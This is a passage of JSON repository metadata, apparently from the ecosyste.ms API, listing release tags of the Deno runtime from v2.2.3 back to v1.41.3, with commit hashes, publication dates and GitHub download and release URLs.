.2.3/manifests"},{"name":"v2.2.2","sha":"b2e5efd3826974857f4e5a94d87c2c724fa5bf5d","kind":"commit","published_at":"2025-02-25T07:17:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.2/manifests"},{"name":"v2.2.1","sha":"6057bc30da1df2b247f584b5280e1f10c02eec75","kind":"commit","published_at":"2025-02-20T23:41:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.1/manifests"},{"name":"v2.2.0","sha":"29688168631edb677a444ba3cd02b2be21304a1f","kind":"commit","published_at":"2025-02-18T23:12:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.0/manifests"},{"name":"v2.1.10","sha":"073e0879791486f70c7ac99d2d100c3fca6ac461","kind":"commit","published_at":"2025-02-13T06:33:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.10","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.10/manifests"},{"name":"v2.1.9","sha":"46e2f9a47ee5293547efd089438db29690a05f85","kind":"commit","published_at":"2025-01-31T00:21:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.9","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.9/manifests"},{"name":"v2.1.8","sha":"318646f7678111d24b139f4c589a4ef447c8cf1c","kind":"commit","published_at":"2025-01-30T18:19:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.8","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.8/manifests"},{"name":"v2.1.7","sha":"379079d9049499af660b70423aa7cc3aca0d5e52","kind":"commit","published_at":"2025-01-22T00:51:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.7/manifests"},{"name":"v2.1.6","sha":"4ee86d8d125c7b36570e87f0725eb82b6fe4a4b4","kind":"commit","published_at":"2025-01-16T23:35:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.6/manifests"},{"name":"v2.1.5","sha":"d15a95e28b0ec015c2f2a88cca3882ba96d5da98","kind":"commit","published_at":"2025-01-09T20:55:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.5/manifests"},{"name":"v2.1.4","sha":"b32ed7516cfdaaff76203ca530796d6a1235568d","kind":"commit","published_at":"2024-12-11T03:31:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.4/manifests"},{"name":"v2.1.3","sha":"7f9b1ff30f7d9880b7c825c2b5f2de3137343d76","kind":"commit","published_at":"2024-12-05T23:36:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.3/manifests"},{"name":"v2.1.2","sha":"2039abe8d2bc82fa800f4118707a48ac6f5e02ae","kind":"commit","published_at":"2024-11-28T15:45:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.2/manifests"},{"name":"v2.1.1","sha":"5d71b461530f7c374c08701cef5678a5a4ac5484","kind":"commit","published_at":"2024-11-21T17:28:20.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.1/manifests"},{"name":"v2.1.0","sha":"3da4eca7c1ed97906654671669e0bb3b095bc637","kind":"commit","published_at":"2024-11-21T02:05:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.0/manifests"},{"name":"v2.0.6","sha":"8f59d18202e94e5c54ad7e5a79ec1383159e4a20","kind":"commit","published_at":"2024-11-10T04:38:11.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.6/manifests"},{"name":"v2.0.5","sha":"78a799b4947461eb5c6092295cbcdabfe94053f7","kind":"commit","published_at":"2024-11-06T00:19:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.5/manifests"},{"name":"v2.0.4","sha":"b7c282d2f80b12b0b2a435780fb0ea2b236ab224","kind":"commit","published_at":"2024-10-30T00:15:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.4/manifests"},{"name":"v2.0.3","sha":"997bd47fc27ad920f3388c94a95829ff45394c84","kind":"commit","published_at":"2024-10-25T00:57:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.3/manifests"},{"name":"v2.0.2","sha":"22a79ea420e67e783d996d5d1d64983192cb3dd8","kind":"commit","published_at":"2024-10-17T23:28:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.2/manifests"},{"name":"v2.0.1","sha":"99c2aa573057e337f3474d43a7aab8c5e6b4caa2","kind":"commit","published_at":"2024-10-16T22:42:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.1/manifests"},{"name":"v2.0.0","sha":"a62c7e036ab6851c0293f407ead635a7331445b7","kind":"commit","published_at":"2024-10-08T14:37:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.0/manifests"},{"name":"v1.46.3","sha":"a98e146a55b209458160bcd148497310a9e14441","kind":"commit","published_at":"2024-09-04T12:12:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.46.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.46.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.46.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.3/manifests"},{"name":"v1.46.2","sha":"1b62d42631013724432f1ba4a3b04f506450abba","kind":"commit","published_at":"2024-08-29T16:07:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.46.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.46.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.46.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.2/manifests"},{"name":"v1.46.1","sha":"de11ff8c556c6922f832f639f54e5f7a6a3096b9","kind":"commit","published_at":"2024-08-22T14:18:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.46.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.46.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.46.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.1/manifests"},{"name":"v1.46.0","sha":"3314a0ceb8f874986d5da9f36f683740bd813750","kind":"commit","published_at":"2024-08-22T00:16:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.46.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.46.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.46.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.0/manifests"},{"name":"v1.45.5","sha":"52fd273834c0675f651577e23785d76f67423ab1","kind":"commit","published_at":"2024-07-31T19:11:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.5/manifests"},{"name":"v1.45.4","sha":"c0b1d19d559bfb1fbb65675b3849a9c0396d131f","kind":"commit","published_at":"2024-07-26T16:38:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.4/manifests"},{"name":"v1.45.3","sha":"87ce64e57486fc006e82806c9ed8c49f11c2cb73","kind":"commit","published_at":"2024-07-22T21:34:15.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.3/manifests"},{"name":"v1.45.2","sha":"85de4280a1f9fae572a7331db6344cee123ddab7","kind":"commit","published_at":"2024-07-12T20:04:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.2/manifests"},{"name":"v1.45.1","sha":"c841d163e3dc344c06f10579672cc5e2b095933f","kind":"commit","published_at":"2024-07-11T18:46:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.1/manifests"},{"name":"v1.45.0","sha":"04ff5c731d55f2402e7b08e378eaf6e5a5a4d961","kind":"commit","published_at":"2024-07-10T22:08:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.0/manifests"},{"name":"v1.44.4","sha":"892e7c20ac6e7bc0601f4c23e64f43187c1b8479","kind":"commit","published_at":"2024-06-19T16:28:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.4/manifests"},{"name":"v1.44.3","sha":"ab2ab0f7fc4e7bda16544ef96a5e6ba114e799b5","kind":"commit","published_at":"2024-06-19T00:19:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.3/manifests"},{"name":"v1.44.2","sha":"9ca1320746072001feab9f6a26e9c1518609bd7b","kind":"commit","published_at":"2024-06-13T00:51:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.2/manifests"},{"name":"v1.44.1","sha":"e02a32be2797f7c107d19da8bf2aff5bbcd97bad","kind":"commit","published_at":"2024-06-05T23:05:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.1/manifests"},{"name":"v1.44.0","sha":"f3ffffc682604349b96dbe4ad33daa5dd1a09f63","kind":"commit","published_at":"2024-05-30T05:58:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.0/manifests"},{"name":"v1.43.6","sha":"7df3d5aeec14f24e5fdec1e1e6f5739f1fbeebbe","kind":"commit","published_at":"2024-05-21T23:34:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.6","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.6/manifests"},{"name":"v1.43.5","sha":"a13c4531fd2c08617767cc8a0788b9e20ac27d45","kind":"commit","published_at":"2024-05-18T00:22:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.5/manifests"},{"name":"v1.43.4","sha":"d64921c1906ee1ac39230c16abe9ff8c546bd645","kind":"commit","published_at":"2024-05-16T23:28:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.4/manifests"},{"name":"v1.43.3","sha":"d6ad253882a6c066e0c673ff64e6554a37bb3487","kind":"commit","published_at":"2024-05-10T20:37:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.3/manifests"},{"name":"v1.43.2","sha":"acd75bbd75fdf46c213d7b21093e09349318da5d","kind":"commit","published_at":"2024-05-08T22:21:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.2/manifests"},{"name":"v1.43.1","sha":"5ff881a0737eccceed55a0ace3ef3110d5b72b2f","kind":"commit","published_at":"2024-05-01T06:46:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.1/manifests"},{"name":"v1.43.0","sha":"5ff881a0737eccceed55a0ace3ef3110d5b72b2f","kind":"commit","published_at":"2024-05-01T06:46:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.0/manifests"},{"name":"v1.42.4","sha":"7cb23c5e3ee0b6c416f4c0e34c7c63fdf5024138","kind":"commit","published_at":"2024-04-16T00:17:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.4/manifests"},{"name":"v1.42.3","sha":"a64a257024c9933d90494613ac6b302cc69df6fa","kind":"commit","published_at":"2024-04-12T00:54:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.3/manifests"},{"name":"v1.42.2","sha":"04c0a4cbf7c00811d3ace3184c1cb8597a0e88f1","kind":"commit","published_at":"2024-04-11T06:39:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.2/manifests"},{"name":"v1.42.1","sha":"08f0613b390b289d07c6ea165bed0518809b34e8","kind":"commit","published_at":"2024-04-01T06:33:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.1/manifests"},{"name":"v1.42.0","sha":"9c6eca1064de029e560377bef831e69d22c5c00b","kind":"commit","published_at":"2024-03-28T00:47:33.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.0/manifests"},{"name":"v1.41.3","sha":"0d7662e1556a60bcc4b7075752fb2c2842b1afea","kind":"co